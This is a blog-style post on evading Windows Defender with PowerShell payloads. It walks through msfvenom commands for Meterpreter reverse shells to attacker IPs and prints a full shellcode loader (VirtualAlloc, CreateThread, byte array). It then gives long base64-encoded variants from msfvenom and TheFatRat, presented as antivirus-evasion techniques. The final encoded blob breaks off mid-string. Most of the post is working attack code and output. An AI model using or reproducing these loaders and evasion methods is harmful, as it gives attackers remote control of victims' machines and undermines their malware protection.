Avoiding windows defender detection – powershell payload

How to avoid detection is a question of every attacker. In those days it is not easy to create payload which will avoid detection and triggering alarm. All antivirus software vendors including microfoft defender are putting big effort to protect users against threats, and each day they are doing their job better and better. They are constantly updating the system of detection and filling the databases with virus signatures. As soon as new virus is shown in the wild it is just a matter of time when the patch is available. From the other side also attackers are not sitting with the crossed hands. Ever day they are looking for the new ways to avoid detection, they are compiling new codes and recompiling existent codes with goal to avoid detection and compromising the system. Remember, there is no protection which will 100% protect you. This is never ending cat and mouse game between antivirus vendors and attackers, and the game which will never end and where the attackers are always one step in the lead.

In this post I will rely on the powershell scripting language, which is still the best, most popular and common language for creating payload and compromising windows operating system. Powershell is a task based command line shell and scripting language built on .NET. powershell, which helps system administrators and power users rapidly automate tasks that manage operating systems and processes. But I should to mention and we need to take into account, that it is just a matter of time when the game between powershell payloads and windows defender will end, since microsoft are really putting big effort in defending the system. Why, you will see in the further text.

In the further text I will show you how the payloads were creating in the past and how are creating today, and also I will describe how the detection was evolving in midtime.

In the past it was just enough that you used one line code in e.g. msfvenom which was generated payload. But those times are far behind us.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe

or for raw powershell payload:

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest –platform win –arch x86

which give you next output:

$KrJpyZMB = @”
[DllImport(“kernel32.dll”)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(“kernel32.dll”)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
“@

$bvznJqWjba = Add-Type -memberDefinition $KrJpyZMB -Name “Win32” -namespace Win32Functions -passthru

[Byte[]] $zqiGAfUTkxCBu = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0x90,0x1f,0x0,0x0,0xe8,0x9c,0x0,0x0,0x0,0x2f,0x31,0x73,0x41,0x4c,0x31,0x42,0x6d,0x36,0x30,0x36,0x59,0x31,0x46,0x6a,0x51,0x58,0x61,0x52,0x49,0x43,0x56,0x41,0x77,0x4e,0x62,0x77,0x6c,0x79,0x73,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x0,0x0,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x30,0x34,0x0

$VifvHnUwWmKQjn = $bvznJqWjba::VirtualAlloc(0,[Math]::Max($zqiGAfUTkxCBu.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($zqiGAfUTkxCBu,0,$VifvHnUwWmKQjn,$zqiGAfUTkxCBu.Length)

$bvznJqWjba::CreateThread(0,0,$VifvHnUwWmKQjn,0,0,0)

But very soon basic creation of payloads was patched, so the attackers were forced to find the new way. Soon they are figured out that encoding of payload will avoid detection. Because of encoded payload windows defender and other antivirus vendors did not know what is hiding behind the encoded string, so it was easily compromised the system.

Here are few examples of encoded payloads created with different payload generators.

Payload created with msfvenom:

Take a note that in that case was used base64 encoder which is not installed in metasploit by default.

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest | msfvenom –payload – –platform win –arch x86 –encoder base64 NOEXIT SYSWOW64

c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand JABHAGwAeQBaAEgAVQBsAEkAVgBkAEgAcgAgAD0AIABAACIADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAIgBAAA0ACgANAAoAJABaAGoAQgBJAEcARQBkAFMAeABmAG4AQgBmAFkAUgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEcAbAB5AFoASABVAGwASQBWAGQASAByACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQANAAoADQAKAFsAQgB5AHQAZQBbAF0AXQAgACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAsADAAeAAwACwAMAB4ADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4AGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAZAAsADAAeAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAyACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAYQAsADAAeAAzAGMALAAwAHgAOABiACwAMAB4ADQAYwAsADAAeAAxADEALAAwAHgANwA4ACwAMAB4AGUAMwAsADAAeAA0ADgALAAwAHgAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAZAAsADAAeAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADQALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQALAAwAHgAOABiACwAMAB4ADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAOQAwACwAMAB4ADEAZgAsADAAeAAwACwAMAB4ADAALAAwAHgAZQA4ACwAMAB4ADkAYwAsADAAeAAwACwAMAB4ADAALAAwAHgAMAAsADAAeAAyAGYALAAwAHgANgBjACwAMAB4ADQAMwAsADAAeAA2AGIALAAwAHgANAA1ACwAMAB4ADYAMwAsADAAeAAzADUALAAwAHgANgAxACwAMAB4ADQANgAsADAAeAA3ADgALAAwAHgANQA0ACwAMAB4ADQAOQAsADAAeAA0ADEALAAwAHgANQA5ACwAMAB4ADQAMQAsADAAeAA0ADYALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeAA0ADcALAAwAHgANQAxACwAMAB4ADUAZgAsADAAeAAzADgALAAwAHgANAAxACwAMAB4ADMAMwAsADAAeAAzADQALAAwAHgANAA2ACwAMAB4ADQANAAsADAAeAA3ADYALAAwAHgANwA5ACwAMAB4ADcAOAAsADAAeAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAALAAwAHgAMgAsADAAeAA2ADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4AGEALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGUAMQAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAxADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAAwACwAMAB4ADAALAAwAHgANAAwACwAMAB4ADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAyADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgANwAsADAAeAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADcAZAAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADQALAAwAHgAMAANAAoADQAKAA0ACgAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACAAPQAgACQAWgBqAEIASQBHAEUAZABTAHgAZgBuAEIAZgBZAFIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsAFsATQBhAHQAaABdADoAOgBNAGEAeAAoACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAuAEwAZQBuAGcAdABoACwAMAB4ADEAMAAwADAAKQAsADAAeAAzADAAMAAwACwAMAB4ADQAMAApAA0ACgANAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAsADAALAAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACwAJABGAHcAWABmAEsAegBjAHoAcgBoAHIAbgBmAC4ATABlAG4AZwB0AGgAKQANAAoADQAKACQAWgBqAEIASQBHAEUAZABTAHgAZgBuAEIAZgBZAFIAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACwAMAAsADAALAAwACkADQAKAA==

Payload created with TheFatRat:

powershell -w 1 -C “sv di -;sv qG ec;sv Foj ((gv di).value.toString()+(gv qG).value.toString());powershell (gv Foj).value.toString() ‘JABqAEYARgAgAD0AIAAnACQATABaAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATABaAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgAYgBmACwAMAB4ADAAMgAsADAAeABkAGEALAAwAHgAZAAyACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBiACwAMAB4ADgAMwAsADAAeABjADIALAAwAHgAMAA0ACwAMAB4ADMAMQAsADAAeAA0ADIALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA0AGEALAAwAHgAZgBlACwAMAB4ADcANAAsADAAeAA2ADUALAAwAHgAYgA0ACwAMAB4AGYAZgAsADAAeAA4ADQALAAwAHgAMABhACwAMAB4ADMAYwAsADAAeAAxAGEALAAwAHgAYgA1ACwAMAB4ADAAYQAsADAAeAA1AGEALAAwAHgANgBlACwAMAB4AGUANQAsADAAeABiAGEALAAwAHgAMgA4ACwAMAB4ADIAMgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADcAYwAsADAAeABkADcALAAwAHgAOQBhACwAMAB4ADMANAAsADAAeABhADkALAAwAHgAZAA4ACwAMAB4ADIAYgAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4AGUAYwAsADAAeAA3ADYALAAwAHgAMgBlACwAMAB4AGIAMgAsADAAeAAyADAALAAwAHgANQA5ACwAMAB4ADAAZgAsADAAeAA3AGQALAAwAHgAMwA1ACwAMAB4ADkAOAAsADAAeAA0ADgALAAwAHgANgAwACwAMAB4AGIANAAsADAAeABjADgALAAwAHgAMAAxACwAMAB4AGUAZQAsADAAeAA2AGIALAAwAHgAZgBkACwAMAB4ADIANgAsADAAeABiAGEALAAwAHgAYgA3ACwAMAB4ADcANgAsADAAeAA3ADQALAAwAHgAMgBhACwAMAB4AGIAMAAsADAAeAA2AGIALAAwAHgAYwBjACwAMAB4ADQAZAAsADAAeAA5ADEALAAwAHgAMwBkACwAMAB4ADQANwAsADAAeAAxADQALAAwAHgAMwAxACwAMAB4AGIAZgAsADAAeAA4ADQALAAwAHgAMgBjACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAYwA5ACwAMAB4ADAAOQAsADAAeAAzADIALAAwAHgANQBjACwAMAB4ADMAOQAsADAAeABlADUALAAwAHgAYwA1ACwAMAB4AGIANAAsADAAeAA3ADAALAAwAHgAMAA2ACwAMAB4ADYAOQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4AGYANQAsADAAeAA3ADMALAAwAHgAMwBkACwAMAB4ADcAOQAsADAAeABlADYALAAwAHgAMAAxACwAMAB4ADMANwAsADAAeAA3AGEALAAwAHgAOQBiACwAMAB4ADEAMQAsADAAeAA4AGMALAAwAHgAMAAxACwAMAB4ADQANwAsADAAeAA5ADcALAAwAHgAMQA3ACwAMAB4AGEAMQAsADAAeAAwAGMALAAwAHgAMABmACwAMAB4AGYAYwAsADAAeAA1ADAALAAwAHgAYwAwACwAMAB4AGQANgAsADAAeAA3ADcALAAwAHgANQBlACwAMAB4AGEAZAAsADAAeAA5AGQALAAwAHgAZAAwACwAMAB4ADQAMgAsADAAeAAzADAALAAwAHgANwAxACwAMAB4ADYAYgAsADAAeAA3AGUALAAwAHgAYgA5ACwAMAB4ADcANAAsADAAeABiAGMALAAwAHgAZgA3ACwAMAB4AGYAOQAsADAAeAA1ADIALAAwAHgAMQA4ACwAMAB4ADUAYwAsADAAeAA1ADkALAAwAHgAZgBhACwAMAB4ADMAOQAsADAAeAAzADgALAAwAHgAMABjACwAMAB4ADAAMwAsADAAeAA1ADkALAAwAHgAZQAzACwAMAB4AGYAMQAsADAAeABhADEALAAwAHgAMQAxACwAMAB4ADAAOQAsADAAeABlADUALAAwAHgAZABiACwAMAB4ADcAYgAsADAAeAA0ADUALAAwAHgAOQA3ACwAMAB4ADgANgAsADAAeABmADcALAAwAHgAOQA1ACwAMAB4ADAAZgAsADAAeAAzAGUALAAwAHgAOQAxACwAMAB4AGYAYgAsADAAeABhADYALAAwAHgAOQA0ACwAMAB4ADAAOQAsADAAeAA0AGYALAAwAHgANABlACwAMAB4ADMAMwAsADAAeABjAGQALAAwAHgAYgAwACwAMAB4ADYANQAsADAAeAAwAGEALAAwAHgAMABhACwAMAB4ADEAZAAsADAAeABkADUALAAwAHgAMwBlACwAMAB4AGYAZgAsADAAeABmADIALAAwAHgAYgAxACwAMAB4AGYAYQAsADAAeABhADkALAAwAHgAOABkACwAMAB4AGUANgAsADAAeAAwADQALAAwAHgAOAAwACwAMAB4ADMAZQAsADAAeABiAGEALAAwAHgAOQAwACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANgBmACwAMAB4ADAAZAAsADAAeAA3ADMALAAwAHgAMAAyACwAMAB4ADkAMAAsADAAeABjAGQALAAwAHgANgAzACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAYwBkACwAMAB4ADcAMwAsADAAeABlAGYALAAwAHgAZAA1ACwAMAB4AGEAYgAsADAAeAAyADMALAAwAHgAYgBlACwAMAB4AGUAMQAsADAAeAA0ADQALAAwAHgAOQA2ACwAMAB4ADcAOAAsADAAeAA0ADUALAAwAHgAOQAyACwAMAB4ADQAZgAsADAAeAAxADQALAAwAHgAMwBmACwAMAB4ADgAZAAsADAAeAAzAGQALAAwAHgAYgBiACwAMAB4AGQAYQAsADAAeAAxADUALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAA1AGYALAAwAHgAYwAxACwAMAB4ADUAZQAsADAAeABjAGEALAAwAHgAYwBhACwAMAB4ADYAOAAsADAAeABlADIALAAwAHgANQA5ACwAMAB4ADgAMgAsADAAeAA3ADIALAAwAHgAYgA0ACwAMAB4ADAAOQAsADAAeAAzAGIALAAwAHgAZgBhACwAMAB4AGEAYgAsADAAeAAwAGYALAAwAHgAMwBjACwAMAB4ADIAOQAsADAAeAA1AGEALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeABiAGEALAAwAHgANQBkACwAMAB4ADUANwAsADAAeAA3ADcALAAwAHgAYgBmACwAMAB4ADAAZAAsADAAeAAwADQALAAwAHgAMgA0ACwAMAB4AGUAOAAsADAAeABlADIALAAwAHgAZgBjACwAMAB4AGEAMgAsADAAeABmAGQALAAwAHgANQAwACwAMAB4ADIAZQAsADAAeAAwADgALAAwAHgAZgBkACwAMAB4ADgAZQAsADAAeABiADgALAAwAHgAMAA0ACwAMAB4ADAAYgAsADAAeAA2AGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADQAMQAsADAAeAA0ADQALAAwAHgANwAyACwAMAB4AGUANQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADcAMwAsADAAeAAzAGMALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABmADkALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA1ADgALAAwAHgAMQAyACwAMAB4AGQANgAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADUAMQAsADAAeAAyADYALAAwAHgANAA3ACwAMAB4ADIAMAAsADAAeABhADYALAAwAHgAMQAzACwAMAB4AGUAOAAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4AGYANAAsADAAeAAwADYALAAwAHgAYQAwACwAMAB4ADkAOQAsADAAeAA1ADMALAAwAHgAMQA5ACwAMAB4ADEAZQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgAZAAsADAAeABhADEALAAwAHgANQA4ACwAMAB4ADkAYwAsADAAeAA0AGQALAAwAHgAYwBhACwAMAB4ADUAOAAsADAAeAA5AGMALAAwAHgAMABkACwAMAB4ADAAYQAsADAAeAAwAGEALAAwAHgAZgA0ACwAMAB4AGQANQAsADAAeABhAGUALAAwAHgAZgBmACwAMAB4AGUAMQAsADAAeAAxAGEALAAwAHgANwBiACwAMAB4ADYAYwAsADAAeABiAGEALAAwAHgAYgA3ACwAMAB4ADAAZAAsADAAeAA3ADQALAAwAHgANgBhACwAMAB4ADUAZgAsADAAeAAwAGUALAAwAHgANQBiACwAMAB4ADkANQAsADAAeAA5AGYALAAwAHgANQBkACwAMAB4AGMAZAAsADAAeABmAGQALAAwAHgAOABkACwAMAB4AGYANwAsADAAeAA3ADgALAAwAHgAMQBmACwAMAB4ADQAZQAsADAAeAAyADIALAAwAHgAZgBmACwAMAB4ADIAMAAsADAAeABjADQALAAwAHgAM